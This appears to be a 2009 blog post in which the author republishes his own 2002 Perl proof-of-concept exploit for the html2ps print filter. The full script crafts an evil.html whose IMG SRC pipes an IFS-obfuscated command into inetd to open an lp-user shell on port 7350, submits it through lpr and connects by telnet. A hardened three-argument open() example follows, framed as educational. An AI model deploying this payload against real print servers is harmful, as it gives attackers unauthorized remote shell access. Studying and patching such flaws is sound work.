Tuesday, March 10, 2009

Some news

This post satisfies two needs (besides publishing code at all):

First, I hate how this blog automatically wraps my lines and how it de-formats all the things I am doing. I try to submit pure HTML code now and hope it works. Second, I decided to publish some old exploits of mine for historical, technical and educational purposes. A recent law case in Germany showed that jail-or-not is all about your intention. It is legal to publish dual-use code or code that could be used to do something evil if your intention is to make the world a more secure place or to teach others how to protect themselves, etc. It is illegal to publish such code in order to commit a crime, which is clearly and obviously not what I am doing.

The code is so old (2002) that there should hardly be any box left which still ships the vulnerable print filter that is exploited here. So, except for teaching something, this code is useless. The interesting thing about this piece is that the print filter didn't accept spaces in the IMG tag, which is why the payload spells its spaces with IFS. But read for yourself:

#!/usr/bin/perl -W
use strict;

# html2ps remote "lp" exploit. Opens shell on port 7350.
# If used for testing remote machines, /etc/printcap must
# contain appropriate remote printer names etc. and lpd must
# be set up correctly.
# (C) 2002 Sebastian Krahmer, proof of concept exploit.

# Brief problem description: lprng calls print filters as any
# other print-spooling system does. It calls them with the UID of lp,
# that's why you get an lp-user shell later. The html2ps filter, which is
# a perl script, is called to convert evil.html to .ps.
# However, there it breaks because html2ps calls the open() function insecurely
# and some other bad stuff is done too. It tries to convert the IMG embedded
# in the html and invokes some commands which give us access. That's all. :)

sub usage
{
    print "\n$0 <printhost> <remote-host>\n".
          "\tprinthost -- name of printer in /etc/printcap\n".
          "\tremote-host -- IP or hostname of host where shell appears\n".
          "'$0 lp 127.0.0.1' is recommended for everyone's own machine\n\n";
    exit;
}

my $printhost = shift || usage();
my $remote    = shift || usage();

print "Constructing evil.html ...\n";

# The IMG SRC starts with "|" so that html2ps' two-argument open() treats
# it as a command pipe; IFS=A lets "A" stand in for the spaces the filter
# would not accept. The "\$" keeps the literal "$" in the written file.
open O, ">evil.html" or die $!;
print O <<__eof__;
<HTML>
<IMG SRC="|IFS=A;X=A;echo\${X}7350\${X}stream\${X}tcp\${X}nowait\${X}lp\${X}/bin/sh\${X}-i|dd\${X}of=/tmp/f;inetd\${X}/tmp/f">
</HTML>
__eof__

close O;

# Hand the file to the print spooler, which runs the filter as user lp.
if (fork() == 0) {
    exec("/usr/bin/lpr", "-P", $printhost, "evil.html");
}
wait;
sleep 3;
print "Connecting ...\n";
exec("/usr/bin/telnet", $remote, 7350);
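The root cause above is Perl's two-argument open(), which parses its string argument and turns a leading "|" into a command pipe. As an added example that is not part of the original post or of html2ps, here is how a filter should open an attacker-supplied image path instead; the function name and the constructed SRC values are mine.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Hardened replacement for the pattern html2ps got wrong (added example).
# Two-argument open($fh, $string) interprets $string: "|cmd" becomes a
# pipe to a shell, "<", ">" and ">>" select modes, so a SRC attribute taken
# from the document becomes a command line. The three-argument form fixes
# the mode and never parses the name; the allow-list limits what the name
# may be in the first place.
sub safe_open_image {
    my ($src, $base) = @_;

    # Only relative paths made of plain characters; anything a shell or
    # two-argument open() would find meaningful ("|", ";", "$", "{") fails.
    return (undef, "rejected: characters outside the allow-list")
        unless $src =~ m{\A[A-Za-z0-9_./-]+\z};
    return (undef, "rejected: absolute path") if $src =~ m{\A/};
    return (undef, "rejected: path traversal")
        if $src =~ m{(?:\A|/)\.\.(?:/|\z)};

    my $path = "$base/$src";
    # Three-argument open with an explicit read mode: the filename is data.
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    return ($fh, undef);
}

# Constructed SRC values: the first has the shape of the payload above,
# the second tries to escape the image directory, the third is legitimate.
for my $src ('|IFS=A;X=A;echo${X}7350', '../../etc/passwd', 'logo.png') {
    my ($fh, $why) = safe_open_image($src, '.');
    print "$src -> ", ($fh ? "opened" : $why), "\n";
    close $fh if $fh;
}
```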

1 comment:

Anonymous said...

Keep posting stuff like this, I really like it.